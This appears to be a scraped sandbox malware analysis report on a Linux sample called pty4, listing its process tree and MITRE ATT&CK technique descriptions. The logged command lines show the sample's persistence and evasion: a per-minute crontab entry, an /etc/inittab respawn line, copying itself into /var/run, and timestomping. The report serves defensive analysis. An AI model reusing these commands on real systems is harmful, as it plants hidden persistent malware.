Analysis Process: pty4 PID: 5307 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5307 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "rm -rf /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5310 Parent PID: 5307

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5310 Parent PID: 5307

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/usr/bin/rm
Arguments:	rm -rf /etc/inittab2
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: pty4 PID: 5311 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5311 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "touch -acmr /bin/ls /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5312 Parent PID: 5311

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: touch PID: 5312 Parent PID: 5311

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/ls /etc/inittab
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Chronological Activities

Analysis Process: pty4 PID: 5313 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5313 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cp -f /tmp/pty4 /var/run/pty4"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5314 Parent PID: 5313

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cp PID: 5314 Parent PID: 5313

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/usr/bin/cp
Arguments:	cp -f /tmp/pty4 /var/run/pty4
File size:	153976 bytes
MD5 hash:	40f10ae7ea3e44218d1a8c306f79c83f

Chronological Activities

Analysis Process: pty4 PID: 5315 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: pty4 PID: 5317 Parent PID: 5315

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5317 Parent PID: 5315

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -l \| grep /var/run/pty4 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/run/pty4 > /dev/null 2>&1 &\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5320 Parent PID: 5317

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5320 Parent PID: 5317

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5321 Parent PID: 5317

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5321 Parent PID: 5317

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep /var/run/pty4
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5322 Parent PID: 5317

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5322 Parent PID: 5317

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v "no cron"
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5324 Parent PID: 5317

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5326 Parent PID: 5324

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5326 Parent PID: 5324

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5325 Parent PID: 5317

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5325 Parent PID: 5317

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty4 PID: 5316 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5316 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab \| grep -v \"/var/run/pty4\" > /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5318 Parent PID: 5316

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5318 Parent PID: 5316

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: sh PID: 5319 Parent PID: 5316

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5319 Parent PID: 5316

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v /var/run/pty4
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: pty4 PID: 5323 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5323 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "echo \"0:2345:respawn:/var/run/pty4\" >> /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pty4 PID: 5327 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5327 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab2 > /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5328 Parent PID: 5327

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5328 Parent PID: 5327

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab2
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: pty4 PID: 5329 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5329 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "rm -rf /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5330 Parent PID: 5329

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5330 Parent PID: 5329

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/usr/bin/rm
Arguments:	rm -rf /etc/inittab2
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: pty4 PID: 5331 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5331 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "touch -acmr /bin/ls /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5332 Parent PID: 5331

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: touch PID: 5332 Parent PID: 5331

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/ls /etc/inittab
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Chronological Activities

Analysis Process: pty4 PID: 5248 Parent PID: 5218

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: pty4 PID: 5250 Parent PID: 5248

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5250 Parent PID: 5248

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "/bin/uname -n"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5251 Parent PID: 5250

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: uname PID: 5251 Parent PID: 5250

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/bin/uname
Arguments:	/bin/uname -n
File size:	39288 bytes
MD5 hash:	4ac7c634c5bec95753c480e9d421dcc2

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code. The at command within Linux operating systems enables administrators to schedule tasks.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as Bash History and /var/log/*.
Tactics:	Defense Evasion
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Linux Analysis Report pty4

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Process Tree

Yara Overview

Memory Dumps

Jbx Signature Overview

AV Detection:

Networking:

System Summary:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

Runtime Messages

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Program Segments

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

IRC Packets

System Behavior

Analysis Process: pty4 PID: 5218 Parent PID: 5115

General

Analysis Process: pty4 PID: 5219 Parent PID: 5218

General

Analysis Process: sh PID: 5219 Parent PID: 5218

General

Analysis Process: sh PID: 5220 Parent PID: 5219

General

Analysis Process: pidof PID: 5220 Parent PID: 5219

General

Analysis Process: pty4 PID: 5221 Parent PID: 5218

General

Analysis Process: sh PID: 5221 Parent PID: 5218

General

Analysis Process: sh PID: 5222 Parent PID: 5221

General

Analysis Process: pidof PID: 5222 Parent PID: 5221

General

Analysis Process: pty4 PID: 5225 Parent PID: 5218